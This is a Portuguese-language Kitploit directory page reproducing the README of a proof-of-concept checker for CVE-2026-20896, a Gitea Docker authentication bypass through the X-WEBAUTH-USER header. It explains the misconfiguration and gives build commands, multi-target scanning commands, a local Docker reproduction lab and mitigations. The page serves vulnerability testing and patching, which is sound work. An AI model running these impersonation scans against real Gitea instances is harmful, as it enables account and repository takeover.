Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER verificador de bypass de autenticação | Kitploit
Ferramentas/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER verificador de bypass de autenticação

Ver Repositório
101há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Verificador de Bypass de Autenticação Docker Gitea CVE-2026-20896

Apenas para operações autorizadas de red team / pentest.

Este repositório contém um verificador mínimo para o CVE-2026-20896, um bypass de autenticação em imagens oficiais do Gitea Docker até a versão 1.26.2 quando a autenticação por reverse-proxy está ativada.

O que é o CVE-2026-20896

As imagens Docker do Gitea afetadas incluíam um template app.ini com:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

Quando um administrador ativava:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

O Gitea confiava em X-WEBAUTH-USER de qualquer IP de origem que conseguisse alcançar diretamente a porta HTTP do container. Um cliente que contornasse o reverse-proxy de autenticação pretendido poderia enviar um único cabeçalho e se passar por um utilizador conhecido ou adivinhável.

O impacto prático é a personificação de contas não autenticadas. Se o utilizador adivinhado for um administrador, o pior caso é a tomada total do nível da aplicação da instância Gitea e seus repositórios. RCE no host depende do ambiente e não é reivindicado por este verificador.

As versões corrigidas começam em 1.26.3; recomenda-se atualizar para 1.26.4 ou superior.

Como o PoC funciona

O verificador:

  1. Obtém a página inicial do alvo.
  2. Procura texto no rodapé, como Powered by Gitea Version: 1.26.4.
  3. Por padrão, ignora o teste se a versão analisada for >= 1.26.3.
  4. Envia pedidos GET / com X-WEBAUTH-USER: <username> para cada nome de utilizador fornecido.
  5. Reporta um acerto quando o título da página retornada se parece com um painel logado para aquele utilizador.

A versão em Go suporta múltiplos alvos, ficheiros de nomes de utilizador, concorrência, timeouts, saída JSONL, TLS --insecure, --dry-run e --force.

Compilar

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

Nenhuma dependência Go de terceiros é necessária.

Uso

Alvo único:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

Múltiplos alvos e nomes de utilizador:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

Execução de teste (dry run):

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Fallback em Bash:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

Códigos de saída

  • 0: pelo menos uma personificação vulnerável foi confirmada
  • 1: nenhuma personificação vulnerável foi confirmada
  • 2: erro de uso, entrada ou execução

Laboratório de Reprodução Local

O laboratório a seguir inicia um container local afetado do Gitea e cria um utilizador de teste:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

Resultado positivo esperado:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

Limpeza:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

Mitigação

  • Atualize o Gitea para 1.26.3 ou superior; 1.26.4 ou superior é preferível.
  • Não exponha a porta HTTP do container backend do Gitea diretamente a redes não confiáveis.
  • Configure explicitamente os reverse-proxies confiáveis.
  • Mantenha a autenticação por reverse-proxy desativada a menos que o caminho de rede e o limite de confiança do proxy sejam compreendidos.

Referências

  • Aviso do Gitea: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Notas de lançamento do Gitea para 1.26.3 / 1.26.4: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • PR de correção: https://github.com/go-gitea/gitea/pull/38151
  • Registo CVE: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • Relatório de sondagem em campo via The Hacker News / telemetria Sysdig: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
Baixar ferramenta